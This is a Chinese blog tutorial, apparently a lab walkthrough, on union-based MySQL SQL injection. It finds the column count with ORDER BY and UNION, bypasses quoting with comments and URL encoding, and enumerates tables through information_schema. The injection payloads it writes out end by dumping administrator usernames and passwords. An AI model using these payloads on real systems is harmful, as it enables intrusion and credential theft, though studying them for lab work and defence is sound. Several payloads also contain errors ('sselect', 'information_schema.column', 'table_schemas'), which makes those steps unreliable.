目录
[1.order by](#1.order by)
[2. 直接使用联合查询,依次在后面加列数](#2. 直接使用联合查询,依次在后面加列数)
首先了解以下MySQL常用函数:
1.database() 查询当前数据库;
data:image/s3,"s3://crabby-images/75189/751895fedab9b23fa23c67e9f93a97503ecbaa1c" alt=""
2.user() 查看当前用户;
data:image/s3,"s3://crabby-images/2a45a/2a45a58d2e8995c19334b59b60a968c7f1991bba" alt=""
3.version() 查看当前数据库的版本;
data:image/s3,"s3://crabby-images/55f17/55f1774d22f2fd2ddcc7605106265996dbfaa7b8" alt=""
4.length() 查看长度;
data:image/s3,"s3://crabby-images/c0e34/c0e34e49c47a73039c0f2640ccc1f2362de02f7c" alt=""
5.substr() 截取数据库的某个字段(不能从0开始);
例:(1,2)从第一位开始截取两个字符
data:image/s3,"s3://crabby-images/becf6/becf67b5a1c8b7b16c8bf0dbccb0b9ad9de10887" alt=""
6.substring() 与substr相同;
7.ascii() 将英文字符转为asc码;
例:拿上面截取到的字符
data:image/s3,"s3://crabby-images/86496/86496b1840214807678b660fc058d18803632dad" alt=""
知道这些函数对我们SQL注入有很大的帮助。
SQL注入流程:
1.判断注入点
2.判断注入点类型
3.判断数据库类型
4.获取数据库数据,提权
前两步在上一篇博客已经提到了,那么接下来是如何判断数据库的类型:
判断数据库的类型,主要是通过各种数据库特有的函数,字符串处理,注释等来排除、猜测数据库的类型。
那么常见数据库有:Oracle、MySQL、SQL Server、Access、Postgresql、mongodb等
上三步都完成后咱们来看看第四步该如何完成:
例:通过sql注入获取管理员的账号及密码,数据库类型为mysql且假设无过滤。
一、联合查询
要知道数据库信息,我们可以通过联合查询找到我们想要的信息,但是联合查询需要前后两个表的列数相同,那我们怎么去判断表的列数呢:
1.order by
mysql可以通过order by + 列名 进行排序,那么可以通过order by知道被查询的表有多少列;
select * from users order by (1~n)
用1~n来代替第一列到第n列的列名,当列数不对时,会出现报错,那么此时就可以确定该表的列数为报错前的列数
如下图,当 列数不对时,会报出以下错误
data:image/s3,"s3://crabby-images/3c133/3c133e54be590d1d9e17a1998826a28408dd6d80" alt=""
id=1' order by 4--+ --+用于逃逸单引号
data:image/s3,"s3://crabby-images/884a9/884a9b81ee16a798bf627b7fc57213fd41f46fc4" alt=""
2. 直接使用联合查询,依次在后面加列数
select * from users union select 1,2,~,n;
该方法是当列数正确是得出结果,不正确会提示列数不同
data:image/s3,"s3://crabby-images/d8b2a/d8b2af7ee205ba20a681407889ae2c1e1e10e4a8" alt=""
id=1' union sselect 1,2--+
data:image/s3,"s3://crabby-images/ea754/ea754362e97672170ab5c50a79b91ce8d4b7604a" alt=""
通过上面的方法,我们已经知道列数了,但是上述方法都需要我们逃逸出单引号,如果没有逃逸出来,mysql会将单引号内当成一个整体,就不会执行后面的命令了。
data:image/s3,"s3://crabby-images/62974/6297472f46a0b81c225f3cf15e21044d508b965d" alt=""
二、怎么逃逸单引号:
需要对原有单引号进行闭合----再加一个单引号:
data:image/s3,"s3://crabby-images/1576b/1576b1574960b2ff9f39784d6670571ebd4b4aad" alt=""
但是这样的话,会多出一个单引号,出现语法报错
解决方法如下:
1.可以再加一个单引号;
id=1''
2.注释;(--空格、#、/**/);
(1)#号:
id=1'#
data:image/s3,"s3://crabby-images/c60a3/c60a3784968dcff948706cc1e34c76412602a9dd" alt=""
此时通过#号注释还是出现了报错:因为url地址栏有特殊的编码方式(urlcode),它会将一些不符合它编码规则的全部进行编码
url编码规则:求asc码,转16进制,在前面加%;
例:单引号---%27
data:image/s3,"s3://crabby-images/b4f4c/b4f4c9e1938cad694ce4b33586f0c153215e29d7" alt=""
同理#号被编码为%23---此时成功
data:image/s3,"s3://crabby-images/5fa7f/5fa7fc49c855ddbd6a05ad68c29398eef24754c2" alt=""
(2)--空格:
同理空格也需要编码--- %20 (--+也可以;因为在RFC-1738标准中,空格在url编码以后为+号)
此时咱们已经知道表的列数了,那么我们可以进行联合查询
id=1' union select 1,database(),3--+ 通过刚刚的函数将2替换得出当前数据库
但是并没有获取到数据,因为当id=1时,查询正常,但只取出了第一列数据;如果想让第二列被取出来只有第一列查不出来数据,才会将第二列取出来;要想第一列取不出数据---要么id特别大,要么id是-1;
data:image/s3,"s3://crabby-images/ce0f0/ce0f0ac959fce922fef754212b7f278fc8e9054c" alt=""
id=-1' union select 1,database(),3--+ 获取到当前数据库
data:image/s3,"s3://crabby-images/49562/4956206bfdda1b835e7b64f6d5888be2a80b148d" alt=""
三、获取表名
MySQL中官方提供以下几个库:information_schema、mysql、performance_schema、sys;可以从这几个库里找
data:image/s3,"s3://crabby-images/f181c/f181c7744b1d5f598d820bb5846407cb1caf98ea" alt=""
一般是在information_schema中寻找
data:image/s3,"s3://crabby-images/e4ce7/e4ce7555fd6b866e0ee83675cea2db7788328528" alt=""
通过限制获取对应数据库的表名
在url栏中查询(查询成功,但没有取到想要的表名)
id=-1' union select 1,2,table_name from information_schema.tables where table_schema='security'--+
data:image/s3,"s3://crabby-images/9460e/9460e9218778c3d837daf669f97d4c7cc038a19c" alt=""
可以通过limit(0,1、1,1、2,1、3,1......)
id=-1' union select 1,2,table_name from information_schema.tables where table_schema='security' limit 1,1--+
可以通过group_concat()将查询的表名转为一列---得到需要的表名,还能起到连接作用
id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
四、得到表名查询列名
id=-1' union select 1,2,group_concat(column_name) from information_schema.column where table_schemas='security' and table_name='users'--+
data:image/s3,"s3://crabby-images/32129/32129e9c866f4b2341ec371598360b05b36a3922" alt=""
五、查询账号及密码
表名、列名都已经被我们知道了,那么就可以获取到管理员的账号及密码了
id=-1' union select 1,2,group_concat(username,0x7e,password) from users--+
data:image/s3,"s3://crabby-images/519c8/519c8a85fc2c2d2cd3d9f6df044c4a50536cd063" alt=""
此时SQL注入完成。